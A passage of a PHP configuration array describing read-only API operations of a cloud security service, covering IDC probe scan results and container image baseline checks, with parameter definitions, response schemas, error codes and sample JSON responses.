'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeIdcProbeList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeIdcProbeList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0C8487EF-50C2-54BB-8634-10F8C35D****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 30,\\n \\"Count\\": 17\\n },\\n \\"IdcProbes\\": [\\n {\\n \\"Status\\": 0,\\n \\"LinuxPort\\": \\"22\\",\\n \\"InternetIp\\": \\"47.98.*.*\\",\\n \\"IdcRegion\\": \\"cn-hangzhou\\",\\n \\"InstanceId\\": \\"i-xxxxx\\",\\n \\"IpSegments\\": \\"192.168.1.0/24\\",\\n \\"IntranetIp\\": \\"10.68.*.*\\",\\n \\"Uuid\\": \\"inet-eae02b9a-1dbd-44a6-844c-69072b27****\\",\\n \\"IntervalPeriod\\": 16,\\n \\"InstanceName\\": \\"oraclexxx\\",\\n \\"PeriodUnit\\": \\"day\\",\\n \\"WinPort\\": \\"3389\\",\\n \\"IdcName\\": \\"3K IDC\\",\\n \\"ServiceStatus\\": 0\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeIdcProbeScanResultList' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The search conditions for assets. This parameter is in JSON format. Parameter names are case-sensitive.'."\n" .'> You can search for assets by instance ID, instance name, VPC ID, region, or public IP address.', 'type' => 'string', 'required' => false, 'example' => '[{\\"name\\":\\"scannedIp\\",\\"value\\":\\"192.168.2.11\\"}]', 'title' => ''], ], [ 'name' => 'LogicalExp', 'in' => 'query', 'schema' => ['description' => 'The logical relationship between multiple search conditions. Valid values:'."\n" ."\n" .'- **OR**: The search conditions are in a logical **OR** relationship.'."\n" .'- **AND**: The search conditions are in a logical **AND** relationship.', 'type' => 'string', 'required' => false, 'example' => 'OR', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status list of the corresponding probes. Separate multiple values with commas. Valid values:'."\n" .'- **0**: active'."\n" .'- **1**: ignored'."\n" .'- **2**: invalid'."\n" .'- **3**: expired'."\n" .'- **4**: probe does not exist.', 'type' => 'string', 'required' => false, 'example' => '0,1', 'title' => ''], ], [ 'name' => 'FoundStartTime', 'in' => 'query', 'schema' => ['description' => 'The start time of the scan discovery period.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1720006818000', 'title' => ''], ], [ 'name' => 'FoundEndTime', 'in' => 'query', 'schema' => ['description' => 'The end time of the scan discovery period.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1720006819000', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A3D7C47D-3F11-57BB-90E8-E5C20C61****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Instances' => [ 'description' => 'The list of instances.', 'type' => 'array', 'items' => [ 'description' => 'The list of instances.', 'type' => 'object', 'properties' => [ 'ValidPort' => ['description' => 'The scanned port.', 'type' => 'string', 'example' => '22', 'title' => ''], 'ProbeIntranetIp' => ['description' => 'The private IP address of the associated machine instance.', 'type' => 'string', 'example' => '192.168.*.*', 'title' => ''], 'Os' => ['description' => 'The operating system type of the asset. Valid values:'."\n" .'- **windows**'."\n" .'- **linux**.', 'type' => 'string', 'example' => 'Linux', 'title' => ''], 'ClientStatus' => ['description' => 'The online status of the probe instance client. Valid values:'."\n" ."\n" .'- **online**: The Agent client on the asset is enabled.'."\n" .'- **offline**: The Agent client on the asset is disabled.', 'type' => 'string', 'example' => 'online', 'title' => ''], 'ProbeInternetIp' => ['description' => 'The public IP address of the associated machine instance.', 'type' => 'string', 'example' => '42.121.*.*', 'title' => ''], 'LastScanTime' => ['description' => 'The timestamp of the latest scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1720006818000', 'title' => ''], 'IpSegment' => ['description' => 'The IP segment list.', 'type' => 'string', 'example' => '192.168.2.0/24', 'title' => ''], 'ProbeMachineName' => ['description' => 'The name of the associated machine instance.', 'type' => 'string', 'example' => 'i-xxxx', 'title' => ''], 'ScannedIp' => ['description' => 'The scanned IP address.', 'type' => 'string', 'example' => '192.168.*.*', 'title' => ''], 'ProbeUuid' => ['description' => 'The UUID of the associated machine instance.', 'type' => 'string', 'example' => '11C96623-E106-59C9-866D-A6C82911****'."\n", 'title' => ''], 'IdcName' => ['description' => 'The name of the IDC server room.', 'type' => 'string', 'example' => '3K机房广州', 'title' => ''], 'ScanResultId' => ['description' => 'The scan result ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1231', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query IDC probe scan results', 'summary' => 'Retrieves the list of assets discovered by IDC probes.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeIdcProbeScanResultList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeIdcProbeScanResultList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A3D7C47D-3F11-57BB-90E8-E5C20C61****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 69,\\n \\"Count\\": 9\\n },\\n \\"Instances\\": [\\n {\\n \\"ValidPort\\": \\"22\\",\\n \\"ProbeIntranetIp\\": \\"192.168.*.*\\",\\n \\"Os\\": \\"Linux\\",\\n \\"ClientStatus\\": \\"online\\",\\n \\"ProbeInternetIp\\": \\"42.121.*.*\\",\\n \\"LastScanTime\\": 1720006818000,\\n \\"IpSegment\\": \\"192.168.2.0/24\\",\\n \\"ProbeMachineName\\": \\"i-xxxx\\",\\n \\"ScannedIp\\": \\"192.168.*.*\\",\\n \\"ProbeUuid\\": \\"11C96623-E106-59C9-866D-A6C82911****\\\\n\\",\\n \\"IdcName\\": \\"3K机房广州\\",\\n \\"ScanResultId\\": 1231\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImage' => [ 'summary' => 'Queries the digest of an image.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ImageRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the image.'."\n" .'> You can call the [DescribeImageInstances](~~DescribeImageInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'ImageInstanceId', 'in' => 'query', 'schema' => ['description' => 'The image instance ID.'."\n" .'> You can call the [DescribeImageInstances](~~DescribeImageInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'cri-hfs6gaawhyu6****', 'title' => ''], ], [ 'name' => 'ImageTag', 'in' => 'query', 'schema' => ['description' => 'The image tag.'."\n" .'> You can call the [DescribeImageInstances](~~DescribeImageInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '1.8.0.15', 'title' => ''], ], [ 'name' => 'ImageRepoId', 'in' => 'query', 'schema' => ['description' => 'The image repository ID.'."\n" .'> You can call the [DescribeImageInstances](~~DescribeImageInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'crr-7i88t7lx3fmf****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used for troubleshooting.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'Data' => [ 'description' => 'The image digest information.', 'type' => 'object', 'properties' => [ 'Digest' => ['description' => 'The image digest value.', 'type' => 'string', 'example' => '0afb98d97f1a4030782fcf47e186909e5ad957bcc182d8be70334e0684b2****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query image digest', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImage'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImage', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"Data\\": {\\n \\"Digest\\": \\"0afb98d97f1a4030782fcf47e186909e5ad957bcc182d8be70334e0684b2****\\"\\n }\\n}","type":"json"}]', ], 'DescribeImageBaselineCheckResult' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92098', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'ImageUuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the image.', 'type' => 'string', 'required' => true, 'example' => 'a910053dd4710173ecc9e9d8931f****', 'title' => ''], ], [ 'name' => 'RiskLevel', 'in' => 'query', 'schema' => ['description' => 'The risk level of the baseline to query. Separate multiple levels with commas (,). By default, all levels are included. Valid values:'."\n" ."\n" .'- **high**: high risk'."\n" ."\n" .'- **medium**: medium risk'."\n" ."\n" .'- **low**: low risk.', 'type' => 'string', 'required' => false, 'example' => 'high,medium,low', 'title' => ''], ], [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The query condition for the baseline.', 'type' => 'string', 'required' => false, 'example' => 'ak_leak', 'title' => ''], ], [ 'name' => 'CriteriaType', 'in' => 'query', 'schema' => ['description' => 'The query type of the baseline to query. Valid values:'."\n" ."\n" .'- **BaselineNameAlias**: baseline name'."\n" ."\n" .'- **BaselineClassAlias**: baseline category.', 'type' => 'string', 'required' => false, 'example' => 'BaselineNameAlias', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page when using paging. Default value: **20**, which indicates that 20 logon configuration entries are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page when using paging. Default value: 20, which indicates the first page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The scan scope.', 'type' => 'array', 'items' => ['description' => 'The scan scope. Valid values:'."\n" ."\n" .'- **image**: image.'."\n" .'- **container**: container.', 'type' => 'string', 'required' => false, 'example' => 'image', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413****', 'title' => ''], 'PageInfo' => [ 'description' => 'The paging information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'BaselineResult' => [ 'description' => 'The details of the image baseline check results.', 'type' => 'array', 'items' => [ 'description' => 'The details of the image baseline check results.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The fix status of the baseline risk. Valid values:'."\n" .'- **0**: Unfixed.'."\n" .'- **1**: Fixed.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'LowRiskItemCount' => ['description' => 'The number of associated low-risk images.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'BaselineNameLevel' => ['description' => 'The risk level of the baseline. Valid values:'."\n" .'- **high**: high risk'."\n" .'- **medium**: medium risk'."\n" .'- **low**: low risk.', 'type' => 'string', 'example' => 'high', 'title' => ''], 'LastScanTime' => ['description' => 'The timestamp of the most recent scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1610304058301', 'title' => ''], 'MiddleRiskItemCount' => ['description' => 'The number of associated medium-risk images.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'BaselineNameKey' => ['description' => 'The name key of the baseline item.', 'type' => 'string', 'example' => 'identification', 'title' => ''], 'BaselineItemCount' => ['description' => 'The number of baseline check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'BaselineNameAlias' => ['description' => 'The alias of the baseline item.', 'type' => 'string', 'example' => '身份鉴别', 'title' => ''], 'BaselineClassAlias' => ['description' => 'The type key of the baseline item.', 'type' => 'string', 'example' => 'identification', 'title' => ''], 'FirstScanTime' => ['description' => 'The timestamp of the first scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1610304058366', 'title' => ''], 'HighRiskItemCount' => ['description' => 'The number of associated high-risk images.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'MissingImageUuid', 'errorMessage' => 'The image ID is required.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Query image baseline check results', 'summary' => 'Queries the detection results of image security scans.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageBaselineCheckResult'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageBaselineCheckResult', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 100,\\n \\"Count\\": 10\\n },\\n \\"BaselineResult\\": [\\n {\\n \\"Status\\": 1,\\n \\"LowRiskItemCount\\": 10,\\n \\"BaselineNameLevel\\": \\"high\\",\\n \\"LastScanTime\\": 1610304058301,\\n \\"MiddleRiskItemCount\\": 1,\\n \\"BaselineNameKey\\": \\"identification\\",\\n \\"BaselineItemCount\\": 5,\\n \\"BaselineNameAlias\\": \\"身份鉴别\\",\\n \\"BaselineClassAlias\\": \\"identification\\",\\n \\"FirstScanTime\\": 1610304058366,\\n \\"HighRiskItemCount\\": 1\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageBaselineCheckSummary' => [ 'summary' => 'Queries the image baseline check list of image security scans.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'RiskLevel', 'in' => 'query', 'schema' => ['description' => 'The risk level of the baselines to query. Separate multiple levels with commas (,). Valid values:'."\n" ."\n" .'- **high**: high risk'."\n" ."\n" .'- **medium**: medium risk'."\n" ."\n" .'- **low**: low risk.', 'type' => 'string', 'required' => false, 'example' => 'high', 'title' => ''], ], [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The query condition of the baseline.', 'type' => 'string', 'required' => false, 'example' => 'Unauthorized access', 'title' => ''], ], [ 'name' => 'CriteriaType', 'in' => 'query', 'schema' => ['description' => 'The query type of the baselines to query. Valid values:'."\n" ."\n" .'- **BaselineNameAlias**: baseline name'."\n" ."\n" .'- **BaselineClassAlias**: baseline category.', 'type' => 'string', 'required' => false, 'example' => 'BaselineNameAlias', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number to display from the returned results. Minimum value: **1**. Default value: **1**, which indicates that the first page is displayed.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster to query.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'c60b77fe62093480db6164a3c2fa5****', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The collection of scan ranges.', 'type' => 'array', 'items' => ['description' => 'The scan range. Valid values:'."\n" ."\n" .'- **container**: container'."\n" .'- **image**: image.', 'type' => 'string', 'required' => false, 'example' => 'container', 'title' => ''], 'required' => false, 'maxItems' => 2, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '5BD95679-D63A-4151-97D0-188432F4A57', 'title' => ''], 'PageInfo' => [ 'description' => 'The paging information displayed on the page in a paged query.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The current page number in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of image baseline check results per page in a paged query. Default value: **20**, which indicates that 20 image baseline check results are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of query results.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], ], 'title' => '', 'example' => '', ], 'BaselineResultSummary' => [ 'description' => 'The details of the image baseline check list.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The fix status of the baseline risk. Valid values:'."\n" .'- **0**: Unfixed.'."\n" .'- **1**: Fixed.'."\n" .'- **2**: Pending verification.'."\n" .'- **3**: Fix failed.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'MiddleRiskImage' => ['description' => 'The number of images with a **medium** risk level that have baseline risk issues.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'BaselineNameLevel' => ['description' => 'The risk level of the baseline. Valid values:'."\n" ."\n" .'- **high**: high risk'."\n" ."\n" .'- **medium**: medium risk'."\n" ."\n" .'- **low**: low risk.', 'type' => 'string', 'example' => 'high', 'title' => ''], 'LastScanTime' => ['description' => 'The timestamp of the most recent scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1626628760000', 'title' => ''], 'HighRiskImage' => ['description' => 'The number of images with a **high** risk level that have baseline risk issues.', 'type' => 'integer', 'format' => 'int32', 'example' => '15', 'title' => ''], 'BaselineNameKey' => ['description' => 'The keyword of the baseline name.', 'type' => 'string', 'example' => 'hc_image_exploit', 'title' => ''], 'BaselineClassKey' => ['description' => 'The keyword of the baseline category.', 'type' => 'string', 'example' => 'hc_image_exploit', 'title' => ''], 'BaselineNameAlias' => ['description' => 'The baseline name.', 'type' => 'string', 'example' => 'Unauthorized access', 'title' => ''], 'BaselineClassAlias' => ['description' => 'The baseline category.', 'type' => 'string', 'example' => 'Unauthorized access', 'title' => ''], 'FirstScanTime' => ['description' => 'The timestamp of the first scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1626628760000', 'title' => ''], 'LowRiskImage' => ['description' => 'The number of images with a **low** risk level that have baseline risk issues.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query image baseline check list for image security scans', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageBaselineCheckSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageBaselineCheckSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"5BD95679-D63A-4151-97D0-188432F4A57\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 3,\\n \\"Count\\": 3\\n },\\n \\"BaselineResultSummary\\": [\\n {\\n \\"Status\\": 0,\\n \\"MiddleRiskImage\\": 0,\\n \\"BaselineNameLevel\\": \\"high\\",\\n \\"LastScanTime\\": 1626628760000,\\n \\"HighRiskImage\\": 15,\\n \\"BaselineNameKey\\": \\"hc_image_exploit\\",\\n \\"BaselineClassKey\\": \\"hc_image_exploit\\",\\n \\"BaselineNameAlias\\": \\"Unauthorized access\\",\\n \\"BaselineClassAlias\\": \\"Unauthorized access\\",\\n \\"FirstScanTime\\": 1626628760000,\\n \\"LowRiskImage\\": 0\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageBaselineDetail' => [ 'summary' => 'Queries the details of baseline check results for image scanning.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92100', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ImageUuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the image.', 'type' => 'string', 'required' => false, 'example' => '06293273b67d19516cfcc712194f****', 'title' => ''], ], [ 'name' => 'BaselineItemKey', 'in' => 'query', 'schema' => ['description' => 'The baseline data information.', 'type' => 'string', 'required' => false, 'example' => '取值包括但不限于以下内容:ak_leak, duplicate_uid,duplicate_pwd_hash,non_pwd_user', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.', 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF4****', 'title' => ''], 'BaselineDetail' => [ 'description' => 'The image baseline details.', 'type' => 'object', 'properties' => [ 'Advice' => ['description' => 'The remediation suggestion for the baseline check risk item.', 'type' => 'string', 'example' => '删除泄漏的AK信息。', 'title' => ''], 'ResultId' => ['description' => 'The asynchronous request ID.', 'type' => 'string', 'example' => 'async__c6f3b0b54613383b40bdce593ffe****', 'title' => ''], 'Description' => ['description' => 'The description of the baseline risk item.', 'type' => 'string', 'example' => 'Access Key泄露,会导致Access Key被冒用的风险。', 'title' => ''], 'BaselineItemAlias' => ['description' => 'The alias of the baseline sub-item.', 'type' => 'string', 'example' => 'Access Key泄露', 'title' => ''], 'BaselineNameAlias' => ['description' => 'The alias of the baseline name.', 'type' => 'string', 'example' => 'Access Key泄露', 'title' => ''], 'BaselineClassAlias' => ['description' => 'The alias of the baseline classification.', 'type' => 'string', 'example' => 'ak_leak', 'title' => ''], 'BaselineItemKey' => ['description' => 'The key of the baseline sub-item.', 'type' => 'string', 'example' => 'ak_leak', 'title' => ''], 'Prompt' => ['description' => 'The baseline issue prompt.', 'type' => 'string', 'example' => '/usr/aksk.txt:yourAccessKeyID', 'title' => ''], 'Level' => ['description' => 'The risk level of the check item. Valid values:'."\n" ."\n" .'- **high**: High risk level.'."\n" ."\n" .'- **medium**: Medium risk level.'."\n" ."\n" .'- **low**: Low risk level.', 'type' => 'string', 'example' => 'high', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query image baseline check result details', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageBaselineDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageBaselineDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 